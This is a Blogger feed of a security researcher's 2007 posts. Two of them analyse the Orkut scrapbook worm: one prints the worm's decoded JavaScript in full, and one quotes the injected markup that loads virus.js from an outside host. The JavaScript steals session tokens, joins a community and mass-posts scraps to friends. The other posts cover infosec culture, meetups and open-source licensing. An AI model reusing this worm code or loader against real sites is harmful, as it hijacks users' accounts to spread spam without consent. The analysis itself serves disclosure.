I hope that the Jeremiahs and RSnakes of the world will jump in soon and tell me how the worm actually works.&lt;br /&gt;&lt;br /&gt;Decoded Javascript:&lt;br /&gt;&lt;br /&gt;var index=0;&lt;br /&gt;var POST=JSHDF["CGI.POST_TOKEN"];&lt;br /&gt;var SIG=JSHDF["Page.signature.raw"];&lt;br /&gt;&lt;br /&gt;function createXMLHttpRequest(){&lt;br /&gt;    try {&lt;br /&gt;        return new&lt;br /&gt;        ActiveXObject("Msxml2.XMLHTTP")&lt;br /&gt;    }&lt;br /&gt;    catch(e){&lt;br /&gt;    } ;&lt;br /&gt;&lt;br /&gt;    try {&lt;br /&gt;        return new ActiveXObject("Microsoft.XMLHTTP")&lt;br /&gt;    }&lt;br /&gt;    catch(e){&lt;br /&gt;    };&lt;br /&gt;&lt;br /&gt;    try {&lt;br /&gt;        return new XMLHttpRequest()&lt;br /&gt;    }&lt;br /&gt;    catch(e){&lt;br /&gt;    } ;&lt;br /&gt;    return null&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function setCookie(name,value,expires,path,domain,secure){&lt;br /&gt;    var curCookie=name+"="+escape(value)+(expires?";expires="+expires.toGMTString():"")+(path?";path="+path:"")+(domain?";domain="+domain:"")+(secure?";secure":"");&lt;br /&gt;    document.cookie=curCookie&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function getCookie(name){&lt;br /&gt;    var dc=document.cookie;&lt;br /&gt;    var prefix=name+"=";&lt;br /&gt;    var begin=dc.indexOf(";"+prefix);&lt;br /&gt;    if(begin==-1){&lt;br /&gt;        begin=dc.indexOf(prefix);&lt;br /&gt;        if(begin!=0){&lt;br /&gt;            return false&lt;br /&gt;        }&lt;br /&gt;    } else {&lt;br /&gt;        begin+=2&lt;br /&gt;    };&lt;br /&gt;    var end=document.cookie.indexOf(";",begin);&lt;br /&gt;&lt;br /&gt;    if(end==-1){&lt;br /&gt;        end=dc.length&lt;br /&gt;    };&lt;br /&gt;    return unescape(dc.substring(begin+prefix.length,end))&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function deleteCookie(name,path,domain){&lt;br /&gt;    if(getCookie(name)){      document.cookie=name+"="+(path?";path="+path:"")+(domain?";domain="+domain:"")+";expires=Thu, 
01-Jan-70 00:00:01 GMT";&lt;br /&gt;        history.go(0)&lt;br /&gt;        }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function loadFriends(){&lt;br /&gt;    var xml=createXMLHttpRequest();&lt;br /&gt;    if(xml){&lt;br /&gt;        xml.open("GET","http://www.orkut.com/Compose.aspx",true);&lt;br /&gt;        xml.send(null);&lt;br /&gt;        xml.onreadystatechange=function(){&lt;br /&gt;            if(xml.readyState==4){&lt;br /&gt;                if(xml.status==200){&lt;br /&gt;                    var xmlr=xml.responseText;&lt;br /&gt;                    var div=document.createElement("div");&lt;br /&gt;                    div.innerHTML=xmlr;&lt;br /&gt;                    var select=div.getElementsByTagName("select").item(0);&lt;br /&gt;                    if(select){&lt;br /&gt;                        select.removeChild(select.getElementsByTagName("option").item(0));&lt;br /&gt;                        select.setAttribute("id","selectedList");&lt;br /&gt;                        select.style.display="none";&lt;br /&gt;                        document.body.appendChild(select);&lt;br /&gt;                        sendScrap()&lt;br /&gt;                    }&lt;br /&gt;                } else {&lt;br /&gt;                    loadFriends()&lt;br /&gt;                }&lt;br /&gt;            }&lt;br /&gt;        };&lt;br /&gt;        xml.send(null)&lt;br /&gt;    }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;function cmm_join(){&lt;br /&gt;    var send="POST_TOKEN="+encodeURIComponent(POST)+"&amp;amp;signature="+encodeURIComponent(SIG)+"&amp;amp;Action.join";&lt;br /&gt;    var  xml=createXMLHttpRequest();&lt;br /&gt;    xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);&lt;br /&gt;    xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');&lt;br /&gt;    xml.send(send);&lt;br /&gt;    xml.onreadystatechange=function(){&lt;br /&gt;        if(xml.readyState==4){&lt;br /&gt;            
if(xml.status!=200){&lt;br /&gt;                cmm_join();&lt;br /&gt;                return&lt;br /&gt;            };&lt;br /&gt;            loadFriends()&lt;br /&gt;        }&lt;br /&gt;    }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function sendScrap(){&lt;br /&gt;    if(index==document.getElementById("selectedList").length){&lt;br /&gt;        return&lt;br /&gt;    };&lt;br /&gt;    var scrapText="Boas festas de final de ano![silver]"+new Date().getTime()+"[/silver] ";&lt;br /&gt;        var   send="Action.submit=1&amp;amp;POST_TOKEN="+encodeURIComponent(POST)+"&amp;amp;scrapText="+encodeURIComponent(scrapText)+"&amp;amp;signature="+encodeURIComponent(SIG)+"&amp;amp;toUserId="+document.getElementById("selectedList").item(index).value;&lt;br /&gt;&lt;br /&gt;    var xml=createXMLHttpRequest();&lt;br /&gt;    xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);&lt;br /&gt;    xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");&lt;br /&gt;    xml.send(send);&lt;br /&gt;    xml.onreadystatechange=function(){&lt;br /&gt;        if(xml.readyState==4){&lt;br /&gt;            index++;&lt;br /&gt;            var wDate=new Date;&lt;br /&gt;            wDate.setTime(wDate.getTime()+86400);&lt;br /&gt;            setCookie('wormdoorkut',index,wDate);&lt;br /&gt;            sendScrap()&lt;br /&gt;        }&lt;br /&gt;    }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;if(!getCookie('wormdoorkut')){&lt;br /&gt;    var wDate=new Date;&lt;br /&gt;    wDate.setTime(wDate.getTime()+86400);&lt;br /&gt;    setCookie('wormdoorkut','0',wDate)&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;index=getCookie('wormdoorkut');&lt;br /&gt;cmm_join();&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-2381549055715809294?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://ryanlrussell.blogspot.com/feeds/2381549055715809294/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=2381549055715809294' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2381549055715809294'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2381549055715809294'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/12/more-on-orkut-worm.html' title='More on Orkut worm'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6114250041265022704</id><published>2007-12-18T21:02:00.000-08:00</published><updated>2007-12-19T00:23:41.681-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Orkut "virus"</title><content type='html'>More of a worm, actually.&lt;br /&gt;&lt;br /&gt;I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:&lt;br /&gt;&lt;pre wrap=""&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;pre wrap=""&gt;2008 vem ai... que ele comece mto bem para vc&lt;/pre&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I still don't know exactly what it means, I'm assuming it's Portuguese. Babelfish wasn't any help. 
I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job, Orkut, on the quick response!&lt;br /&gt;&lt;br /&gt;I haven't done any kind of thorough analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:&lt;br /&gt;&lt;br /&gt;&amp;lt;div id="flashDiv295378627"&amp;gt;&amp;lt;embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"&amp;gt;&amp;lt;/embed&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;script type="text/javascript"&amp;gt; var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;Looks like it joins you to an Orkut group, too:&lt;br /&gt;&lt;br /&gt;&lt;A HREF="http://www.orkut.com/Community.aspx?cmm=44001818"&gt;Infectados pelo Vírus do Orkut&lt;/A&gt;.&lt;br /&gt;&lt;br /&gt;Owner of the group is a new-looking account named "Virus do Orkut". 
Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6114250041265022704?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6114250041265022704/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6114250041265022704' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6114250041265022704'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6114250041265022704'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html' title='Orkut &quot;virus&quot;'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-2717294422425143073</id><published>2007-10-30T08:23:00.000-07:00</published><updated>2007-10-30T08:25:51.612-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Comment spammers</title><content type='html'>The comment spammers have finally found me. I have tried deleting the comments manually, but they just post a couple more every day. I've turned on CAPTCHAs, we'll see how that works. 
I'm loath to put any barriers in for people wanting to comment, so sorry about that.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-2717294422425143073?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2717294422425143073/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=2717294422425143073' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2717294422425143073'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2717294422425143073'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/10/comment-spammers.html' title='Comment spammers'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5351555586512181302</id><published>2007-07-31T10:08:00.000-07:00</published><updated>2007-07-31T10:12:47.798-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Off to vegas 2007</title><content type='html'>I'm on my way to Las Vegas for Black Hat &amp;amp; Defcon. For Black Hat, it looks like I'm doing a booksigning on Wednesday at 4:30. BigFix is hosting the Gala at 6:00 on Wednesday as well, so I will be putting in an appearance. Please come say hi if you're around. 
I will also be at Defcon, but good luck spotting me in the crowd there if you don't already know what I look like.&lt;br /&gt;&lt;br /&gt;I look forward to catching up with friends I only get to see at cons.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5351555586512181302?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5351555586512181302/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5351555586512181302' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5351555586512181302'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5351555586512181302'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/07/off-to-vegas-2007.html' title='Off to vegas 2007'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5181501474915835286</id><published>2007-07-19T10:36:00.000-07:00</published><updated>2008-05-03T14:21:45.021-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>The Ladies of Infosec</title><content type='html'>I was at an event not long ago, and the woman in the group was really pissed. 
In a room full of nothing but security geeks, someone asked her "Oh, do you do security work?"&lt;br /&gt;&lt;br /&gt;This didn't happen with any of the guys. The question they got was "Where do you work?"&lt;br /&gt;&lt;br /&gt;I was thinking about this today, and I realized that every woman I know who works in infosec has told me a similar story. That might be a slight exaggeration, but not much. Literally every one I can think of right now has told me one of these stories.&lt;br /&gt;&lt;br /&gt;They get things like:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Are you here with your boyfriend?&lt;/li&gt;&lt;li&gt;She used to be a man&lt;/li&gt;&lt;li&gt;Take your shirt off&lt;/li&gt;&lt;/ul&gt;Yes, sadly I have heard jerks yell out "take your shirt off" when a woman was trying to give a talk.&lt;br /&gt;&lt;br /&gt;How much do women hate this? You can read what &lt;a href="http://archives.neohapsis.com/archives/isn/2004-q2/0059.html"&gt;Raven thinks&lt;/a&gt; about it.&lt;br /&gt;&lt;br /&gt;Let me tell you a little about this particular woman in question who reminded me of all this. She has worked in some of the most important software companies in the world, in the security groups. She has worked at at least two security companies that I know of. Pick just about any well-known security male, and they know who she is and they respect her work.&lt;br /&gt;&lt;br /&gt;If you've been paying attention to the infosec world, you probably know who I'm talking about. Keep it to yourself, because this particular woman is not the point.&lt;br /&gt;&lt;br /&gt;I have met a number of women at various conferences. I'd look really foolish if I went around assuming they weren't attendees or didn't know what they were doing. I've met a woman who works for the CIA. I've met one who was a heavy-duty cryptographer. I've met one who does BGP vulnerability research. Yes, the women are rare. 
Staring and asking stupid questions doesn't help improve that.&lt;br /&gt;&lt;br /&gt;Because of how hostile the infosec world is to women, the ones who manage to survive tend to really love what they do, and have worked very hard to stay in the field. This may mean that the woman you just met is better at security than 90% of the men. That probably includes you (and I'll happily concede that includes me.)&lt;br /&gt;&lt;br /&gt;Keep that in mind.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5181501474915835286?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5181501474915835286/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5181501474915835286' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5181501474915835286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5181501474915835286'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/07/ladies-of-infosec.html' title='The Ladies of Infosec'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8184293353089329880</id><published>2007-07-18T13:36:00.000-07:00</published><updated>2007-07-18T13:41:33.622-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><category scheme='http://www.blogger.com/atom/ns#' 
term='secphil'/><title type='text'>BaySec 3 Tonight!</title><content type='html'>BaySec 3 is tonight, July 18 2007.&lt;br /&gt;&lt;br /&gt;Per &lt;a href="http://rdist.root.org/2007/07/11/next-baysec-july-18-at-oneills/"&gt;Nate&lt;/a&gt;:&lt;br /&gt;July 18th, 7-11 pm or so. &lt;br /&gt;O'Neills Irish Pub&lt;br /&gt;747 3rd St (at King)&lt;br /&gt;&lt;a class="moz-txt-link-freetext" href="http://www.tisoneills.com/"&gt;http://www.tisoneills.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8184293353089329880?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8184293353089329880/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8184293353089329880' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8184293353089329880'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8184293353089329880'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/07/baysec-3-tonight.html' title='BaySec 3 Tonight!'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8243642095782423823</id><published>2007-07-17T16:46:00.000-07:00</published><updated>2007-07-17T16:51:26.943-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='work'/><category scheme='http://www.blogger.com/atom/ns#' 
term='egoblogging'/><title type='text'>The BigFix logo</title><content type='html'>&lt;a href="http://bigblog.typepad.com/bigfix_the_relay/2007/07/cubism.html"&gt;&lt;img style="cursor: pointer; width: 400px;" src="http://farm2.static.flickr.com/1083/801077200_d8e05b8d49.jpg?v=0" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;I promised to keep my work blogging on the &lt;a href="http://bigblog.typepad.com/"&gt;work blog&lt;/a&gt;, unless I thought I had been particularly clever. I think &lt;a href="http://bigblog.typepad.com/bigfix_the_relay/2007/07/cubism.html"&gt;this one&lt;/a&gt; qualifies.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8243642095782423823?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8243642095782423823/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8243642095782423823' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8243642095782423823'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8243642095782423823'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/07/bigfix-logo.html' title='The BigFix logo'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6247537631153553265</id><published>2007-06-20T08:24:00.000-07:00</published><updated>2007-06-20T08:25:56.208-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>BaySec 2</title><content type='html'>BaySec 2 is tonight, June 20 2007.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.sockpuppet.org/baysec/"&gt;Details here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Hope to see you there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6247537631153553265?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6247537631153553265/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6247537631153553265' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6247537631153553265'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6247537631153553265'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/06/baysec-2.html' title='BaySec 2'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5229030441087509865</id><published>2007-06-06T00:47:00.000-07:00</published><updated>2007-06-06T15:33:26.628-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Attention Jed Pickel</title><content type='html'>It appears that I owe you a &lt;a href="http://archives.neohapsis.com/archives/sf/ids/2002-q3/0010.html"&gt;big apology&lt;/a&gt;. You were right, I was wrong.&lt;br /&gt;&lt;br /&gt;(It's amazing the stuff you find when googling yourself.)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5229030441087509865?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5229030441087509865/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5229030441087509865' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5229030441087509865'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5229030441087509865'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/06/attention-jed-pickel.html' title='Attention Jed Pickel'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6271764955438650072</id><published>2007-06-04T21:23:00.000-07:00</published><updated>2007-06-07T22:12:44.770-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Open Source Remorse</title><content type='html'>So rather than continuing to carry on in the Matasano blog comments (&lt;a href="http://www.matasano.com/log/858/alan-shimel-should-stop-talking-about-snorts-licensing/"&gt;1&lt;/a&gt;, &lt;a href="http://www.matasano.com/log/874/stillsecure-rejects-terms-of-gpl/"&gt;2&lt;/a&gt;) and being mirrored in Alan's &lt;a href="http://www.stillsecureafteralltheseyears.com/ashimmy/2007/06/thomas_ptacek_s.html"&gt;blog&lt;/a&gt;, I figure I should gather my thoughts on this subject in my own long-winded blog entry.&lt;br /&gt;&lt;br /&gt;Now, my recent comments have been prompted &lt;span style="font-weight: bold; font-style: italic;"&gt;by&lt;/span&gt; Alan's and Tom's comments at each other, but they aren't &lt;span style="font-weight: bold; font-style: italic;"&gt;about&lt;/span&gt; that per se. I gather the background there is that StillSecure has released Cobia &lt;strike&gt;which includes Snort (and other open-source bits?),&lt;/strike&gt; but the Cobia bits aren't GPL. I really don't know anything about whether there's any inappropriate linking or anything going on; I haven't looked at it. The StillSecure guys raise some legal doubts about the GPL, and Tom points to Marty's &lt;a href="http://securitysauce.blogspot.com/2007/05/snort-30-licensing.html"&gt;post&lt;/a&gt; about the "clarifications" in the Snort license.&lt;br /&gt;&lt;br /&gt;(Update: Alan tells me that Cobia does NOT include Snort. Leaving me wondering what Tom was upset about in the first place. Shrug. 
Sorry about further muddying things with my incorrect claim, Alan.)&lt;br /&gt;&lt;br /&gt;The key point that Tom raises that I want to take issue with is this:&lt;br /&gt;&lt;blockquote&gt;Why do I care? Because companies like StillSecure are driving open-source projects “underground”, into proprietary licenses. Wow, that sucks.&lt;br /&gt;&lt;/blockquote&gt;Now, let's hang on a second there. It looks more to me like a basic desire to make money has caused the open-source security tools developers to start changing their licenses.&lt;br /&gt;&lt;br /&gt;They have open source remorse.&lt;br /&gt;&lt;br /&gt;It looks more to me like they are finding it difficult to get people to pay them when their stuff is licensed &lt;span style="font-weight: bold; font-style: italic;"&gt;only&lt;/span&gt; under a GPL license. Obviously, if the software is only available under the GPL, then anything else it goes into also needs to be GPL. (Modulo calling vs. linking vs. straight source modification, etc... I'm not here to try to hash that mess out.)&lt;br /&gt;&lt;br /&gt;I've watched this happen with BitTorrent, Nessus, nmap, and Snort.&lt;br /&gt;&lt;br /&gt;Is there anything wrong with making money with software? Certainly not. I've worked at Sybase, contracted at ArcSight, tried my own hand with Enforcer for AnchorIS, and am currently about 4 years in at BigFix. BigFix, by the way, has licensed nmap for commercial use, and Fyodor's licensing terms were very reasonable. All those companies I worked at are traditional, closed-source software vendors. So I fully stand behind profiting from software licensing.&lt;br /&gt;&lt;br /&gt;We are salesmen, and completely up-front about that.&lt;br /&gt;&lt;br /&gt;But I believe there is a different standard if you're going to go the open-source route. 
Maybe I'm too much of an idealist, but then, the GPL is kind of an idealist license.&lt;br /&gt;&lt;br /&gt;So here's the game: You create some very early, proof-of-concept open-source security tool. Maybe you're early to the market, or maybe you have some genuinely nifty feature, but you're a known concept, an IDS or a scanner.&lt;br /&gt;&lt;br /&gt;How do you gain popularity? Well frankly, being free can be a huge help. And if you're not doing it for a living anyway, it works for everyone. What do most open-source projects want? Help. For the packages I've mentioned, they got it.&lt;br /&gt;&lt;br /&gt;Maybe it wasn't in the form of (much) code. But it was in the form of signatures, QA, people running mailing lists, people submitting fingerprints and banners for obscure software, filing bug reports and feature requests, help compiling on weird unixes, packet captures, books, articles, and other general evangelism. The license also allows every Linux distro in the world to ship your stuff, further cementing you as a de facto standard.&lt;br /&gt;&lt;br /&gt;Those things are absolutely &lt;span style="font-style: italic; font-weight: bold;"&gt;massive&lt;/span&gt; contributions for a young project. I don't wish to discount the efforts of the key developers on each of those projects. The packages would most certainly have fallen into obscurity without their leadership. But even then, you don't maintain such a project for years without a positive feedback loop.&lt;br /&gt;&lt;br /&gt;But for the projects mentioned, the maintainers eventually decided they would like to make a living off the project.&lt;br /&gt;&lt;br /&gt;This is where I admit that I don't know what's in the hearts and minds of the people who are now selling commercial licenses for these projects. 
